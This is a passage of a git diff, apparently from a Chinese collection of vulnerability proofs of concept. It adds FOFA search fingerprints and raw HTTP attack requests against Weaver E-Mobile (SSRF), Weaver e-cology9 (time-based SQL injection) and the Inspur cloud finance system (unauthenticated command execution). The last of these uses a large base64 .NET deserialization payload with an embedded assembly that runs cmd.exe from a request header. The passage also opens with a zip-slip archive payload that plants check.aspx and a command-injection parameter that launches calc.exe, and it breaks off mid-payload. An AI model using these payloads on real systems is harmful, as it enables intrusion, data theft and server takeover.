{{unquote("PK\x03\x04\x14\x00\x00\x00\x08\x00\xf2\x9a\x0bW\x97\xe9\x8br\x8c\x00\x00\x00\x93\x00\x00\x00\x1e\x00\x00\x00../../../fdccloud/_/check.aspx$\xcc\xcb\x0a\xc20\x14\x04\xd0_\x09\x91B\xbb\x09\x0a\xddH\xab\x29\x8aP\xf0QZ\xc4\xf5m\x18j!ib\x1e\x82\x7fo\xc4\xdd0g\x98:\xdb\xb1\x96F\xb03\xcdcLa\xc3\x0f\x0b\xce\xb2m\x9d\xa0\xd1\xd6\xb8\xc0\xae\xa4\xe1-\xc9d\xfd\xc7\x07h\xd1\xdc\xfe\x13\xd6%0\xb3\x87x\xb8\x28\xe7R\x96\xcbr5\xacyQ\x9d&\x05q\x84B\xea\x7b\xb87\x9c\xb8\x90m\x28<\xf3\x0e\xaf\x08\x1f\xc4\xdd\x28\xb1\x1f\xbcQ1\xe0\x07EQ\xa5\xdb/\x00\x00\x00\xff\xff\x03\x00PK\x01\x02\x14\x03\x14\x00\x00\x00\x08\x00\xf2\x9a\x0bW\x97\xe9\x8br\x8c\x00\x00\x00\x93\x00\x00\x00\x1e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00../../../fdccloud/_/check.aspxPK\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00L\x00\x00\x00\xc8\x00\x00\x00\x00\x00")}} vsoft=kvm&hostType=physical&name=penson&extranet=127.0.0.1%7Ccalc.exe&cpuCores=2& memory=16&diskSize=16&desc=&uid=640be59da4851&type=za - ``` diff --git a/泛微E-Mobile系统接口installOperate.do存在SSRF漏洞.md b/泛微E-Mobile系统接口installOperate.do存在SSRF漏洞.md new file mode 100644 index 0000000..13b927a --- /dev/null +++ b/泛微E-Mobile系统接口installOperate.do存在SSRF漏洞.md @@ -0,0 +1,23 @@ +# 泛微E-Mobile系统接口installOperate.do存在SSRF漏洞 + +泛微E-Mobile installOperate.do 接口处存在服务器请求伪造漏洞,未经身份验证的远程攻击者利用此漏洞扫描服务器所在的内网或本地端口,获取服务的banner信息,窥探网络结构,甚至对内网或本地运行的应用程序发起攻击,获取服务器内部敏感配置,造成信息泄露。 + +## fofa + +```yaml +header="EMobileServer" +``` + +## poc + +```yaml +GET /install/installOperate.do?svrurl=http://dnslog.cn HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate, br +Connection: close +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407232013270.png) \ No newline at end of file diff --git a/泛微e-cology9接口WorkPlanService前台SQL注入漏洞(XVE-2024-18112).md b/泛微e-cology9接口WorkPlanService前台SQL注入漏洞(XVE-2024-18112).md new file mode 100644 index 0000000..85fe4e7 --- /dev/null +++ b/泛微e-cology9接口WorkPlanService前台SQL注入漏洞(XVE-2024-18112).md @@ -0,0 +1,40 @@ + + +# 泛微e-cology9接口WorkPlanService前台SQL注入漏洞(XVE-2024-18112) + +## poc + +```yaml +POST /services/WorkPlanService HTTP/1.1 +Content-Length: 430 +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 +(KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,i +mage/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9 +SOAPAction: +Content-Type: text/xml;charset=UTF-8 +Host: 192.168.52.168 +Referer: http://192.168.52.168:80/services/WorkPlanService +Cookie: ecology_JSessionid=aaawzto5mqug94J9Fz0cz +Connection: close + + + + + + +(SELECT 8544 FROM +(SELECT(SLEEP(3-(IF(27=27,0,5)))))NZeo) + +22 + + + +``` + diff --git a/浪潮云财务系统bizintegrationwebservice.asmx存在命令执行漏洞.md b/浪潮云财务系统bizintegrationwebservice.asmx存在命令执行漏洞.md new file mode 100644 index 0000000..50bf0cb --- /dev/null +++ b/浪潮云财务系统bizintegrationwebservice.asmx存在命令执行漏洞.md @@ -0,0 +1,33 @@ +# 浪潮云财务系统bizintegrationwebservice.asmx存在命令执行漏洞 + +浪潮云财务系统bizintegrationwebservice.asmx存在命令执行漏洞,未经身份验证的远程攻击者可通过该漏洞在服务器端任意执行代码。 + +## fofa + +```yaml +title="TSCEV4.0" +``` + +## poc + +```yaml +POST /cwbase/gsp/webservice/bizintegrationwebservice/bizintegrationwebservice.asmx HTTP/1.1 +Host: +Content-Type: text/xml; charset=utf-8 +Content-Length: 16396 +SOAPAction: "http://tempuri.org/GetChildFormAndEntityList" +cmd: whoami + + + + + + string + string + AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uV2luZG93cy5Gb3JtcywgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAACFTeXN0ZW0uV2luZG93cy5Gb3Jtcy5BeEhvc3QrU3RhdGUBAAAAEVByb3BlcnR5QmFnQmluYXJ5BwICAAAACQMAAAAPAwAAAMctAAACAAEAAAD/////AQAAAAAAAAAEAQAAAH9TeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5MaXN0YDFbW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAwAAAAZfaXRlbXMFX3NpemUIX3ZlcnNpb24FAAAICAkCAAAACgAAAAoAAAAQAgAAABAAAAAJAwAAAAkEAAAACQUAAAAJBgAAAAkHAAAACQgAAAAJCQAAAAkKAAAACQsAAAAJDAAAAA0GBwMAAAABAQAAAAEAAAAHAgkNAAAADA4AAABhU3lzdGVtLldvcmtmbG93LkNvbXBvbmVudE1vZGVsLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MzFiZjM4NTZhZDM2NGUzNQUEAAAAalN5c3RlbS5Xb3JrZmxvdy5Db21wb25lbnRNb2RlbC5TZXJpYWxpemF0aW9uLkFjdGl2aXR5U3Vycm9nYXRlU2VsZWN0b3IrT2JqZWN0U3Vycm9nYXRlK09iamVjdFNlcmlhbGl6ZWRSZWYCAAAABHR5cGULbWVtYmVyRGF0YXMDBR9TeXN0ZW0uVW5pdHlTZXJpYWxpemF0aW9uSG9sZGVyDgAAAAkPAAAACRAAAAABBQAAAAQAAAAJEQAAAAkSAAAAAQYAAAAEAAAACRMAAAAJFAAAAAEHAAAABAAAAAkVAAAACRYAAAABCAAAAAQAAAAJFwAAAAkYAAAAAQkAAAAEAAAACRkAAAAJGgAAAAEKAAAABAAAAAkbAAAACRwAAAABCwAAAAQAAAAJHQAAAAkeAAAABAwAAAAcU3lzdGVtLkNv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b2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHksIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAYiAAAATlN5c3RlbS5Db3JlLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4ORAQAAAABwAAAAkDAAAACgkkAAAACggIAAAAAAoICAEAAAABEQAAAA8AAAAGJQAAAPUCU3lzdGVtLkxpbnEuRW51bWVyYWJsZStXaGVyZVNlbGVjdEVudW1lcmFibGVJdGVyYXRvcmAyW1tTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmFibGVgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAJIgAAABASAAAABwAAAAkEAAAACgkoAAAACggIAAAAAAoICAEAAAABEwAAAA8AAAAGKQAAAN8DU3lzdGVtLkxpbnEuRW51bWVyYWJsZStXaGVyZVNlbGVjdEVudW1lcmFibGVJdGVyYXRvcmAyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAACSIAAAAQFAAAAAcAAAAJBQAAAAoJLAAAAAoICAAAAAAKCAgBAAAAARUAAAAPAAAABi0AAADmAlN5c3RlbS5MaW5xLkVudW1lcmFibGUrV2hlcmVTZWxlY3RFbnVtZXJhYmxlSXRlcmF0b3JgMltbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAACSIAAAAQFgAAAAcAAAAJBgAAAAkwAAAACTEAAAAKCAgAAAAACggIAQAAAAEXAAAADwAAAAYyAAAA7wFTeXN0ZW0uTGlucS5FbnVtZXJhYmxlK1doZXJlU2VsZWN0RW51bWVyYWJsZUl0ZXJhdG9yYDJbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAJIgAAABAYAAAABwAAAAkHAAAACgk1AAAACggIAAAAAAoICAEAAAABGQAAAA8AAAAGNgAAAClTeXN0ZW0uV2ViLlVJLldlYkNvbnRyb2xzLlBhZ2VkRGF0YVNvdXJjZQQAAAAGNwAAAE1TeXN0ZW0uV2ViLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49YjAzZjVmN2YxMWQ1MGEzYRAaAAAABwAAAAkIAAAACAgAAAAACAgKAAAACAEACAEACAEACAgAAAAAARsAAAAPAAAABjkAAAApU3lzdGVtLkNvbXBvbmVudE1vZGVsLkRlc2lnbi5EZXNpZ25lclZlcmIEAAAABjoAAABJU3lzdGVtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4ORAcAAAABQAAAA0CCTsAAAAICAMAAAAJCwAAAAEdAAAADwAAAAY9AAAANFN5c3RlbS5SdW50aW1lLlJlbW90aW5nLkNoYW5uZWxzLkFnZ3JlZ2F0ZURpY3Rpb25hcnkEAAAABj4AAABLbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5EB4AAAABAAAACQkAAAAQHwAAAAIAAAAJCgAAAAkKAAAAECAAAAACAAAABkEAAAAACUEAAAAEJAAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAgAAAAhEZWxlZ2F0ZQdtZXRob2QwAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCUIAAAAJQwAAAAEoAAAAJAAAAAlEAAAACUUAAAABLAAAACQAAAAJRgAAAAlHAAAAATAAAAAkAAAACUgAAAAJSQAAAAExAAAAJAAAAAlKAAAACUsAAAABNQAAACQAAAAJTAAAAAlNAAAAATsAAAAEAAAACU4AAAAJTwAAAARCAAAAMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQcAAAAEdHlwZQhhc3NlbWJseQZ0YXJnZXQSdGFyZ2V0VHlwZUFzc2VtYmx5DnRhcmdldFR5cGVOYW1lCm1ldGhvZE5hbWUNZGVsZWdhdGVFbnRyeQEBAgEBAQMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BlAAAADVAVN5c3RlbS5GdW5jYDJbW1N5c3RlbS5CeXRlW10sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAABlIAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHkGUwAAAARMb2FkCgRDAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyBwAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlClNpZ25hdHVyZTIKTWVtYmVyVHlwZRBHZW5lcmljQXJndW1lbnRzAQEBAQEAAwgNU3lzdGVtLlR5cGVbXQlTAAAACT4AAAAJUgAAAAZWAAAAJ1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5IExvYWQoQnl0ZVtdKQZXAAAALlN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5IExvYWQoU3lzdGVtLkJ5dGVbXSkIAAAACgFEAAAAQgAAAAZYAAAAzAJTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmFibGVgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAACVIAAAAGWwAAAAhHZXRUeXBlcwoBRQAAAEMAAAAJWwAAAAk+AAAACVIAAAAGXgAAABhTeXN0ZW0uVHlwZVtdIEdldFR5cGVzKCkGXwAAABhTeXN0ZW0uVHlwZVtdIEdldFR5cGVzKCkIAAAACgFGAAAAQgAAAAZgAAAAtgNTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5Db2xs